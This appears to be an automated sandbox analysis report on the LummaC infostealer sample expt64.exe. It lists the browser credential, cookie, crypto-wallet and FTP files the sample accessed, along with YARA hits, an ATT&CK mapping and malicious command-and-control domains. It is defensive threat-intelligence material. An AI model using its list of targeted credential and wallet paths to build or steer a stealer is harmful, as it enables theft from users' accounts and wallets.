Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\expt64.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	Directory queried: C:\Users\user\Documents\GAOBCVIQIJ	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	Directory queried: C:\Users\user\Documents\GAOBCVIQIJ	Jump to behavior

Source: Yara match	File source: 00000000.00000003.2517025375.00000000006E6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: expt64.exe PID: 6988, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: expt64.exe PID: 6988, type: MEMORYSTR
Source: Yara match	File source: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	21 Virtualization/Sandbox Evasion	2 OS Credential Dumping	1 Query Registry	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	11 Deobfuscate/Decode Files or Information	LSASS Memory	221 Security Software Discovery	Remote Desktop Protocol	41 Data from Local System	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	Logon Script (Windows)	Logon Script (Windows)	3 Obfuscated Files or Information	Security Account Manager	21 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	2 Process Discovery	Distributed Component Object Model	Input Capture	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	22 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
expt64.exe	66%	ReversingLabs	Win32.Spyware.Lummastealer
expt64.exe	72%	Virustotal		Browse

Source	Detection	Scanner	Label
https://checkout.steampows	0%	Avira URL Cloud	safe
http://ocsp.sectigo.com05	0%	Avira URL Cloud	safe
https://steambroadcast-test.akamaized#	0%	Avira URL Cloud	safe
https://wordyfindy.lat/apiM:	100%	Avira URL Cloud	malware
https://sputnik-1985.com/t	100%	Avira URL Cloud	malware
https://sputnik-1985.com/	100%	Avira URL Cloud	malware
https://sputnik-1985.com/apijOg	100%	Avira URL Cloud	malware
https://sputnik-1985.com/apiing	100%	Avira URL Cloud	malware
brendon-sharjen.biz	100%	Avira URL Cloud	malware
https://help.stC	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
steamcommunity.com	104.102.49.254	true	false	high
sputnik-1985.com	104.21.64.1	true	false	high
wordyfindy.lat	unknown	unknown	false	high
slipperyloo.lat	unknown	unknown	false	high
curverpluch.lat	unknown	unknown	false	high
tentabatte.lat	unknown	unknown	false	high
manyrestro.lat	unknown	unknown	false	high
bashfulacid.lat	unknown	unknown	false	high
brendon-sharjen.biz	unknown	unknown	false	high
shapestickyr.lat	unknown	unknown	false	high
talkynicer.lat	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
slipperyloo.lat	false		high
https://sputnik-1985.com/api	false		high
https://steamcommunity.com/profiles/76561199724331900	false		high
brendon-sharjen.biz	true	Avira URL Cloud: malware	unknown
curverpluch.lat	false		high
tentabatte.lat	false		high
manyrestro.lat	false		high
bashfulacid.lat	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png	expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtab	expt64.exe, 00000000.00000003.2503963189.0000000003379000.00000004.00000800.00020000.00000000.sdmp	false		high
https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU	expt64.exe	false		high
https://player.vimeo.com	expt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	expt64.exe, 00000000.00000003.2503963189.0000000003379000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#	expt64.exe	false		high
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0	expt64.exe	false		high
https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp	expt64.exe, 00000000.00000003.2490967946.00000000006F0000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491601171.00000000006F0000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/?subsection=broadcasts	expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#	expt64.exe	false		high
https://store.steampowered.com/subscriber_agreement/	expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.gstatic.cn/recaptcha/	expt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cdn.fastly.	expt64.exe, 00000000.00000003.2581042978.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2517025375.00000000006DE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/recaptc	expt64.exe, 00000000.00000003.2581042978.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2517025375.00000000006DE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://sputnik-1985.com/t	expt64.exe, 00000000.00000002.2582315478.00000000006FD000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000002.2583347735.00000000033EE000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.valvesoftware.com/legal.htm	expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.youtube.com	expt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com	expt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2490967946.00000000006F7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491031020.0000000000653000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/	expt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://checkout.steampows	expt64.exe, 00000000.00000003.2581042978.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2517025375.00000000006DE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl	expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis	expt64.exe, 00000000.00000003.2490967946.00000000006F0000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491601171.00000000006F0000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC	expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmp	false		high
https://s.ytimg.com;	expt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1	expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2490967946.00000000006F7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491031020.0000000000653000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491601171.00000000006F8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&	expt64.exe, 00000000.00000003.2490967946.00000000006F0000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491601171.00000000006F0000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/	expt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steam.tv/	expt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://wordyfindy.lat/apiM:	expt64.exe, 00000000.00000002.2581461524.0000000000628000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#	expt64.exe	false		high
https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en	expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmp	false		high
http://store.steampowered.com/privacy_agreement/	expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2490967946.00000000006F7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491031020.0000000000653000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491601171.00000000006F8000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ocsp.sectigo.com05	expt64.exe	false	Avira URL Cloud: safe	unknown
https://store.steampowered.com/points/shop/	expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	expt64.exe, 00000000.00000003.2503963189.0000000003379000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	expt64.exe, 00000000.00000003.2531266282.0000000003350000.00000004.00000800.00020000.00000000.sdmp	false		high
https://steambroadcast-test.akamaized#	expt64.exe, 00000000.00000003.2581042978.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2517025375.00000000006DE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.rootca1.amazontrust.com0:	expt64.exe, 00000000.00000003.2531266282.0000000003350000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a	expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmp	false		high
https://sketchfab.com	expt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	expt64.exe, 00000000.00000003.2503963189.0000000003379000.00000004.00000800.00020000.00000000.sdmp	false		high
https://lv.queniujq.cn	expt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/profiles/76561199724331900/inventory/	expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2490967946.00000000006F7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491031020.0000000000653000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491601171.00000000006F8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	expt64.exe, 00000000.00000003.2532897165.000000000384E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.youtube.com/	expt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/privacy_agreement/	expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng	expt64.exe, 00000000.00000003.2490967946.00000000006F0000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491601171.00000000006F0000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=M_FULq_A	expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2490967946.00000000006F7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491031020.0000000000653000.00000004.00000020.00020000.00000000.sdmp	false		high
https://sputnik-1985.com/	expt64.exe, 00000000.00000003.2517025375.00000000006E6000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2516733335.00000000033E9000.00000004.00000800.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2519546371.00000000006FD000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2568391413.00000000006F4000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491031020.000000000065A000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2580509230.0000000000685000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000002.2583347735.00000000033EE000.00000004.00000800.00020000.00000000.sdmp, expt64.exe, 00000000.00000002.2583347735.00000000033E9000.00000004.00000800.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491031020.0000000000689000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://sputnik-1985.com/apiing	expt64.exe, 00000000.00000003.2517025375.0000000000707000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2519546371.0000000000707000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://sputnik-1985.com/apijOg	expt64.exe, 00000000.00000003.2544998470.0000000000709000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z	expt64.exe	false		high
https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am	expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/recaptcha/	expt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmp	false		high
